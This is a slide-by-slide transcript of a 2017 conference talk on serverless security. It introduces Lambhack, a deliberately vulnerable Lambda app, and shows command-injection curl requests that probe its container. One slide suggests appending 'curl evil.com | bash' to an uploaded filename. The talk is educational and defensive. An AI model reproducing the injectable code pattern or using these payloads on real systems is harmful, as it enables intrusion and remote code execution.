serverless security at lascon 2017
TRANSCRIPT
- 1. LASCON 2017 @WICKETT SERVERLESS SECURITY: A PRAGMATIC PRIMER FOR BUILDERS AND DEFENDERS JAMES WICKETT
- 2. LASCON 2017 @WICKETT Dont worry, this is not a thinly veiled vendor pitch.
- 3. LASCON 2017 @WICKETT WANT THE SLIDES RIGHT NOW? Send an email to [email protected]
- 4. LASCON 2017 @WICKETT HEAD OF RESEARCH AT SIGNAL SCIENCES DEVOPS DAYS AUSTIN ORGANIZER AUTHOR DEVOPS FUNDAMENTALS AT LYNDA.COM BLOGGER AT THEAGILEADMIN.COM AND LABS.SIGNALSCIENCES.COM JAMES WICKETT
- 5. LASCON 2017 @WICKETT SERVERLESS ENCOURAGES FUNCTIONS AS DEPLOY UNITS, COUPLED WITH THIRD PARTY SERVICES THAT ALLOW RUNNING END-TO-END APPLICATIONS WITHOUT WORRYING ABOUT SYSTEM OPERATION. NEW SERVERLESS PATTERNS ARE JUST EMERGING SECURITY WITH SERVERLESS IS EASIER SECURITY WITH SERVERLESS IS HARDER CONCLUSION (1 OF 2)
- 6. LASCON 2017 @WICKETT FOUR KEY AREAS APPLY TO SERVERLESS SECURITY SOFTWARE SUPPLY CHAIN SECURITY DELIVERY PIPELINE SECURITY DATA FLOW SECURITY ATTACK DETECTION LAMBHACK! A VERY VULNERABLE LAMBDA STACK OPEN SOURCE PROJECT GITHUB.COM/WICKETT/LAMBHACK CONCLUSION (2 OF 2)
- 7. LASCON 2017 @WICKETT WHAT IS SERVERLESS?
- 8. LASCON 2017 @WICKETT MISCONCEPTIONS
- 9. LASCON 2017 @WICKETT ITS MARKETING (CLOUD REBRANDED)
- 10. LASCON 2017 @WICKETT SERVERLESS == NO SERVERS
- 11. LASCON 2017 @WICKETT SERVERLESS == BACKEND AS A SERVICE
- 12. LASCON 2017 @WICKETT SERVERLESS == PLATFORM AS A SERVICE
- 13. LASCON 2017 @WICKETT TK: ADRIANCO QUOTE
- 14. LASCON 2017 @WICKETT SO, WHAT IS SERVERLESS?
- 15. LASCON 2017 @WICKETT http://martinfowler.com/articles/serverless.html @MIKEBROBERTS
- 16. LASCON 2017 @WICKETT
- 17. LASCON 2017 @WICKETT 2012 - USED TO DESCRIBE BAAS AND CONTINUOUS INTEGRATION SERVICES RUN BY THIRD PARTIES LATE 2014 - AWS LAUNCHED LAMBDA JULY 2015 - AWS LAUNCHED API GATEWAY OCTOBER 2015 - AWS RE:INVENT - THE SERVERLESS COMPANY USING AWS LAMBDA 2015 TO PRESENT - FRAMEWORKS FORMING 2016 - GOOGLE CLOUD FUNCTIONS, AZURE FUNCTIONS RELEASED 2016 - SERVERLESS CONFERENCES STARTED HISTORY OF SERVERLESS
- 18. LASCON 2017 @WICKETT VMsHardware Serverless Inspiration from @adrianco Waste Value
- 19. LASCON 2017 @WICKETT Decomposed Microservice Architecture
- 20. LASCON 2017 @WICKETT WHAT CAN WE SAY IS SERVERLESS?
- 21. LASCON 2017 @WICKETT SERVERLESS IS FUNCTIONS AS A SERVICE (FaaS)
- 22. LASCON 2017 @WICKETT CONTAINERS ON DEMAND
- 23. LASCON 2017 @WICKETT SERVERLESS IS (NO MANAGEMENT OF) SERVERS
- 24. LASCON 2017 @WICKETT SERVERLESS IS SERVICEFULL
- 25. LASCON 2017 @WICKETT SERVERLESS IS AN OPINIONATED FRAMEWORK FOR COMPUTE AND CONTAINERS
- 26. LASCON 2017 @WICKETT If you want to lead your company bravely into the new world, you would do well to focus lot on how serverless will evolve. - @Cloudopinion https://medium.com/ @cloud_opinion/the-pattern- may-repeat-26de1e8b489d
- 27. LASCON 2017 @WICKETT THE CLOUD WAS TO VIRTUALIZATION AS SERVERLESS WILL BE TO CONTAINERS
- 28. LASCON 2017 @WICKETT SERVERLESS WILL COMPLETELY DISRUPT THE CONTAINER MARKET IN ONE, MAYBE TWO YEARS.
- 29. LASCON 2017 @WICKETT Serverless encourages functions as deploy units, coupled with third party services that allow running end-to-end applications without worrying about system operation. SERVERLESS DEFINITION
- 30. LASCON 2017 @WICKETT SO, WHAT ARE THE UPSIDES?
- 31. LASCON 2017 @WICKETT SCALING BUILT IN
- 32. LASCON 2017 @WICKETT PAY FOR WHAT YOU USE IN 100MS INCREMENTS
- 33. LASCON 2017 @WICKETT WITH SERVERLESS SYSTEM ADMINISTRATION IS (MOSTLY) LOWER
- 34. LASCON 2017 @WICKETT SHORT CIRCUITS OPS AND MOVES INFRASTRUCTURE RUNTIME CLOSER TO DEVS
- 35. LASCON 2017 @WICKETT YOU CAN SKIP DOCKERING ALL THE THINGS!
- 36. LASCON 2017 @WICKETT GREAT, WHATS THE CATCH?
- 37. LASCON 2017 @WICKETT Ops burden to rationalize serverless model @patrickdebois
- 38. LASCON 2017 @WICKETT
- 39. LASCON 2017 @WICKETT VENDOR LOCK-IN
- 40. LASCON 2017 @WICKETT MONITORING
- 41. LASCON 2017 @WICKETT https://speakerdeck.com/smithclay/faas-measurement-fundamentals
- 42. LASCON 2017 @WICKETT https://speakerdeck.com/smithclay/faas-measurement-fundamentals
- 43. LASCON 2017 @WICKETT LOGGING
- 44. LASCON 2017 @WICKETT RELIABILITY
- 45. LASCON 2017 @WICKETT APP NEEDS LARGE LOCAL DISK SPACE LONG RUNNING JOBS BIG I/O TASKS LATENCY SENSITIVE REQUESTS THAT CANT WAIT FOR THE COLD-STARTUP TIME SERVERLESS DEAL KILLERS (MAYBE?)
- 46. LASCON 2017 @WICKETT SERVERLESS USE CASES
- 47. LASCON 2017 @WICKETT http://martinfowler.com/articles/serverless.html MESSAGE PROCESSING
- 48. LASCON 2017 @WICKETT http://martinfowler.com/articles/serverless.html API GATEWAY
- 49. LASCON 2017 @WICKETT WEB APPLICATIONS
- 50. LASCON 2017 @WICKETT CI/CD auth wordpress scraper event ingestion chatbots load testing MORE SERVERLESS USE CASES
- 51. LASCON 2017 @WICKETT Security
- 52. LASCON 2017 @WICKETT LETS TRY A SAMPLE APPLICATION IN AWS
- 53. LASCON 2017 @WICKETT SERVERLESS APEX GO SPARTA KAPPA STEP 1: PICK A FRAMEWORK
- 54. LASCON 2017 @WICKETT
- 55. LASCON 2017 @WICKETT GOLANG! AWS LAMBDA SUPPORTS BRING YOUR OWN BINARY SPARTA WRAPS YOUR COMPILED BINARY WITH A NODE.JS SHIM GO SPARTA ALSO HANDLES ALL THE OTHER AWS SERVICES YOUR APP CONSUMES GO SPARTA
- 56. LASCON 2017 @WICKETT CLOUDWATCH EVENTS AND LOGS DYNAMODB, KINESIS, S3 SES, SNS API GATEWAY CREATION GO SPARTA INCLUDES
- 57. LASCON 2017 @WICKETT BUILD A WORD CLOUD GENERATOR ABLE TO CONSUME 3RD PARTY APIS FOR TEXT SOURCES RETURN JSON WITH COUNTS OF WORDS IN TEXT KEEP IT SIMPLE STEP 2: IDEA!
- 58. LASCON 2017 @WICKETT (USING GO SPARTA FOR THE FRAMEWORK) LAMBDA S3 API GATEWAY STEP 3: DESIGN AND ARCHITECTURE
- 59. LASCON 2017 @WICKETT
- 60. LASCON 2017 @WICKETT STEP 4: WRITE THE HANDLER
- 61. LASCON 2017 @WICKETT STEP 5: SETUP API GATEWAY
- 62. LASCON 2017 @WICKETT STEP 6: SET THE CONFIG DETAILS
- 63. LASCON 2017 @WICKETT STEP 7: PROVISION YOUR APP!
- 64. LASCON 2017 @WICKETT STEP 8: SETUP STRICT IAM POLICIES
- 65. LASCON 2017 @WICKETT STEP 9: GIVE UP AND SET VERY BAD IAM POLICIES PROMISE TO FIX LATER
- 66. LASCON 2017 @WICKETT STEP 10: PROVISION YOUR APP!
- 67. LASCON 2017 @WICKETT APP IN AWS CONSOLE
- 68. LASCON 2017 @WICKETT TEST LAMBDA EXEC IN CONSOLE FIRST RUN OF 343MS
- 69. LASCON 2017 @WICKETT SECOND RUN ONLY TOOK 84MS
- 70. LASCON 2017 @WICKETT API GATEWAY IN CONSOLE
- 71. LASCON 2017 @WICKETT API GATEWAY EXECUTION IN CONSOLE
- 72. LASCON 2017 @WICKETT RETURNED JSON
- 73. LASCON 2017 @WICKETT MONITORING LAMBDA IN CONSOLE
- 74. LASCON 2017 @WICKETT YOU NEED A FRAMEWORK OR YOU DIE. WHY IS IAM SO HAAARRDD? WOW! I HAVE A FULLY ELASTIC, FAST API RUNNING ON THE INTERNET FOR BASICALLY NO COST. THIS IS GOING TO BE HUGE! OVERALL SERVERLESS EXPERIENCE
- 75. LASCON 2017 @WICKETT IS SECURITY READY FOR SERVERLESS?
- 76. LASCON 2017 @WICKETT
- 77. LASCON 2017 @WICKETT SECURITY
- 78. LASCON 2017 @WICKETT many security teams work with a worldview where their goal is to inhibit change as much as possible
- 79. LASCON 2017 @WICKETT OLD PATH VS. NEW PATH Embrace Secrecy Create Feedback Loops Just Pass Audit! Compliance adds Value Enforce Stability Create Chaos Build a Wall Zero Trust Networks Slow Validation Fast and Non-blocking Certainty Testing Adversity Testing Test when Done Shift Left Process Driven The Paved Road
- 80. LASCON 2017 @WICKETT
- 81. LASCON 2017 @WICKETT SECURE SOFTWARE SUPPLY CHAIN DELIVERY PIPELINE DATA FLOW SECURITY ATTACK DETECTION FOUR AREAS OF SERVERLESS SECURITY
- 82. LASCON 2017 @WICKETT source: @devsecops
- 83. LASCON 2017 @WICKETT THE CODE YOU WRITE (AND LIBS) IS YOUR SURFACE AREA NOW CHANGE FROM THE PAST (E.G. SHELLSHOCK, HEARTBLEED) OF THE NUMEROUS FIREDRILLS OUR INDUSTRY HAD TO ENDURE DUE TO INHERITANCE SURFACE AREA REDUCTION
- 84. LASCON 2017 @WICKETT TLS CONTROL TO THE PROVIDER ROUTING CONTROL TO THE PROVIDER CONSUMPTION OF THIRD PARTY SERVICES IAM ROLES AND POLICY CONFUSION SURFACE AREA EXPANSION
- 85. LASCON 2017 @WICKETT SSL / TLS FROM THE PROVIDER
- 86. LASCON 2017 @WICKETT OLD WAY NEW WAY
- 87. LASCON 2017 @WICKETT ROUTING FROM THE PROVIDER
- 88. LASCON 2017 @WICKETT ROUTING THE OLD WAY
- 89. LASCON 2017 @WICKETT ROUTING THE NEW WAY
- 90. LASCON 2017 @WICKETT Lambda + s3 + kinesis + DynamoDB + cloudformation + API Gateway + Auth0 SERVICE AND 3RD PARTY EXPANSION
- 91. LASCON 2017 @WICKETT https://media.ccc.de/v/33c3-7865- gone_in_60_milliseconds IAM ROLES AND POLICIES
- 92. LASCON 2017 @WICKETT Recommendation: Use a third-party service to monitor for provider cong changes
- 93. LASCON 2017 @WICKETT DISABLE ROOT ACCESS KEYS MANAGE USERS WITH PROFILES SECURE YOUR KEYS IN YOUR DEPLOY SYSTEM SECURE KEYS IN DEV SYSTEM USE PROVIDER MFA USE GOOD HYGIENE WITH YOUR PROVIDER
- 94. LASCON 2017 @WICKETT DELIVERY PIPELINE SECURITY
- 95. LASCON 2017 @WICKETT
- 96. LASCON 2017 @WICKETT UNIT TESTING
- 97. LASCON 2017 @WICKETT EASIER TO MOCK HARDER TO MOCK
- 98. LASCON 2017 @WICKETT UNIT TESTING EVEN MORE CRITICAL AS INTEGRATION TESTING IN DEV IS HARDER
- 99. LASCON 2017 @WICKETT USE OF A STAGING OR PRE-PROD ENV END TO END SYNTHETIC INTEGRATION TESTS ALL THE USUAL SUSPECTS INTEGRATION TESTING
- 100. LASCON 2017 @WICKETT CONFIGURATION IS PART OF DELIVERY
- 101. LASCON 2017 @WICKETT ONLY DEV KEYS CAN PUSH TO DEV ONLY BUILD/DEPLOY SYSTEM CAN PUSH TO PRE- PROD INTEGRATION TESTS MUST PASS IN THIS ENV SECURITY VALIDATION MUST TAKE PLACE BEFORE PROMOTION ALLOW PUSH TO PROD, ONLY BY DEPLOY SYSTEM GOOD PIPELINE PRACTICES
- 102. LASCON 2017 @WICKETT BDD-SECURITY - GITHUB.COM/ CONTINUUMSECURITY/BDD-SECURITY GAUNTLT - GAUNTLT.ORG GITHUB.COM/GAUNTLT/GAUNTLT DOCKER RECOMMENDED SECURITY TESTING TOOLS
- 103. LASCON 2017 @WICKETT http://www.slideshare.net/wickett/pragmatic-security-and-rugged-devops-sxsw-2015 GAUNTLT WORKSHOP IN 9 EXAMPLES
- 104. LASCON 2017 @WICKETT DATA FLOW DEVELOPMENT DATA FLOW DIAGRAMS THREAT MODELING RUNTIME LOGGING CUSTOM MONITORS/ METRICS
- 105. LASCON 2017 @WICKETT Your provider is responsible for the underlying infrastructure and services. You are responsible for ensuring you use the services in a secure manner. https://read.acloud.guru/adopting- serverless-architectures-and- security-254a0c12b54a
- 106. LASCON 2017 @WICKETT SPOOFING CONSUMED RESOURCES DENIAL OF SERVICE TIMEOUTS EXECUTION RESTRICTIONS FOR RESOURCES CAPACITY ISSUES DATA FLOW SECURITY
- 107. LASCON 2017 @WICKETT ATTACK DETECTION
- 108. LASCON 2017 @WICKETT DOES APPLICATION SECURITY STILL MATTER?
- 109. LASCON 2017 @WICKETT https://medium.com/ @PaulDJohnston/security-and- serverless-ec52817385c4
- 110. LASCON 2017 @WICKETT
- 111. LASCON 2017 @WICKETT APPSEC GREATEST HITS (XSS, SQLI, CMDEXE) STILL RELEVANT 15 YEARS LATER!
- 112. LASCON 2017 @WICKETT INSPIRED BY ALL THE GOATS
- 113. LASCON 2017 @WICKETT
- 114. LASCON 2017 @WICKETT SERVERLESS HAS A FALSE SENSE OF SECURITY API PROXY LAYER THING PROTECTS ME, RIGHT? ;) WANTED TO SEE MAKE THE POINT THAT APPSEC IS RELEVANT IN SERVERLESS A VULNERABLE LAMBDA + API GATEWAY STACK BORN FROM THE HERITAGE OF WEBGOAT, RAILS GOAT, GRUYERE, AND OTHERS INTRODUCING LAMBHACK
- 115. LASCON 2017 @WICKETT
- 116. LASCON 2017 @WICKETT A VULNERABLE LAMBDA + API GATEWAY STACK OPEN SOURCE, MIT LICENSED INCLUDES ARBITRARY CODE EXECUTION IN A QUERY STRING MORE WORK NEEDED, PULL REQUESTS ACCEPTED AND LOOKING FOR COMMUNITY HELP GITHUB.COM/WICKETT/LAMBHACK github.com/wickett/lamback
- 117. LASCON 2017 @WICKETT lambhack is a vulnerable serverless lambda application It would certainly be a bad idea to base any coding patterns o what you see here.
- 118. LASCON 2017 @WICKETT
- 119. LASCON 2017 @WICKETT WHY IS THIS BAD? command := lambdaEvent.QueryParams[args"] output := runner.Run(command)
- 120. LASCON 2017 @WICKETT With command execution available to us in lambhack, we can poke around the container a bit
- 121. LASCON 2017 @WICKETT UNAME -A $ curl https://XXXX.execute-api.us- east-1.amazonaws.com/prod/lambhack/c?args=uname+-a; +sleep+1" > Linux ip-10-36-34-119 4.4.35-33.55.amzn1.x86_64 #1 SMP Tue Dec 6 20:30:04 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
- 122. LASCON 2017 @WICKETT CAT /PROC/VERSION $ curl https://XXXX.execute-api.us- east-1.amazonaws.com/prod/lambhack/c?args=cat+/proc/ version;+sleep+1 > Linux version 4.4.35-33.55.amzn1.x86_64 (mockbuild@gobi-build-60006) (gcc version 4.8.3 20140911 (Red Hat 4.8.3-9) (GCC) ) #1 SMP Tue Dec 6 20:30:04 UTC 2016
- 123. LASCON 2017 @WICKETT LETS LOOK IN /TMP $ curl https://XXXX.execute-api.us- east-1.amazonaws.com/prod/lambhack/c?args=ls+-la+/tmp; +sleep+1" total 17916 drwx------ 2 sbx_user1056 490 4096 Feb 8 22:02 . drwxr-xr-x 21 root root 4096 Feb 8 21:47 .. -rwxrwxr-x 1 sbx_user1056 490 18334049 Feb 8 22:02 Sparta.lambda.amd64
- 124. LASCON 2017 @WICKETT LAMBDA REUSE IN ACTION! $ curl https://XXXX.execute-api.us-east-1.amazonaws.com/ prod/lambhack/c?args=ls+/tmp;+sleep+1" $ curl https://XXXX.execute-api.us-east-1.amazonaws.com/ prod/lambhack/c?args=touch+/tmp/wickettfile;+sleep+1 $ curl https://XXXX.execute-api.us-east-1.amazonaws.com/ prod/lambhack/args=ls+/tmp;+sleep+1" > Sparta.lambda.amd64 wickettfile
- 125. LASCON 2017 @WICKETT WHICH CURL $ curl https://XXXX.execute-api.us- east-1.amazonaws.com/prod/lambhack/c? args=which+curl;+sleep+1" > /usr/bin/curl
- 126. LASCON 2017 @WICKETT GOT PROXY? $ curl
https://XXXX.execute-api.us- east-1.amazonaws.com/prod/lambhack/c?
args=curl+https://www.example.com; +sleep+1" > "nnn Example
Domainnn n n n n body {n background-color: #f0f0f2;n margin: 0;n
padding: 0;n font-family: "Open Sans", "Helvetica Neue", Helvetica,
Arial, sans-serif;n n }n div {n width: 600px;n margin: 5em auto;n
padding: 50px;n background-color: #fff;n border-radius: 1em;n }n
a:link, a:visited {n color: #38488f;n text-decoration: none;n }n
@media (max-width: 700px) {n body {n background-color: #fff;n }n
div {n width: auto;n margin: 0 auto;n border-radius: 0;n padding:
1em;n }n }n nnnn
n Example Domainnnnn"
This domain is established to be used for illustrative examples in documents. You may use thisn domain in examples without prior coordination or asking for permission.
nMore information...
n - 127. LASCON 2017 @WICKETT HELP NEEDED ADD XSS AND OTHER ATTACKS ADD AUTH VECTORS AND EXAMPLES NEEDS A UI PLEASE! PULL REQUESTS ACCEPTED :) FUTURE OF LAMBHACK
- 128. LASCON 2017 @WICKETT LAMBDA HAS LIMITED BLAST RADIUS, BUT NOT ZERO MONITORING/LOGGING PLAYS A KEY ROLE HERE DETECT LONGER RUN TIMES HIGHER ERROR RATE OCCURRENCES DATA INGESTION LOG ACTIONS OF LAMBDAS APPSEC THOUGHTS
- 129. LASCON 2017 @WICKETT APPLICATION SECURITY IS STILL RELEVANT
- 130. LASCON 2017 @WICKETT New surface area, similar appsec problems Command Exec XSS Injection Attacks Try new things, e.g. appending curl evil.com | bash or alert(1) to a lename you upload on s3 TYPES OF ATTACKS
- 131. LASCON 2017 @WICKETT LOGGING, EMITTING EVENTS USAGE METRICS VANDIUM (SQLI) WRAPPER CONTENT SECURITY POLICY (CSP) API GATEWAYS ARE A GOOD PLACE TO ADD DEFENSE MORE THINGS NEED TO BE DONE HERE DEFENSE
- 132. LASCON 2017 @WICKETT Development in serverless is easier than ever, attracting new developers to web development, as a result, application security will see a rise. FINAL THOUGHT
- 133. LASCON 2017 @WICKETT
- 134. LASCON 2017 @WICKETT SERVERLESS ENCOURAGES FUNCTIONS AS DEPLOY UNITS, COUPLED WITH THIRD PARTY SERVICES THAT ALLOW RUNNING END-TO-END APPLICATIONS WITHOUT WORRYING ABOUT SYSTEM OPERATION. NEW SERVERLESS PATTERNS ARE JUST EMERGING SECURITY WITH SERVERLESS IS EASIER SECURITY WITH SERVERLESS IS HARDER CONCLUSION (1 OF 2)
- 135. LASCON 2017 @WICKETT FOUR KEY AREAS APPLY TO SERVERLESS SECURITY SOFTWARE SUPPLY CHAIN SECURITY DELIVERY PIPELINE SECURITY DATA FLOW SECURITY ATTACK DETECTION LAMBHACK! A VERY VULNERABLE LAMBDA STACK OPEN SOURCE PROJECT GITHUB.COM/WICKETT/LAMBHACK CONCLUSION (2 OF 2)
- 136. LASCON 2017 @WICKETT WANT THE SLIDES RIGHT NOW OR HAVE QUESTIONS? Send an email to [email protected]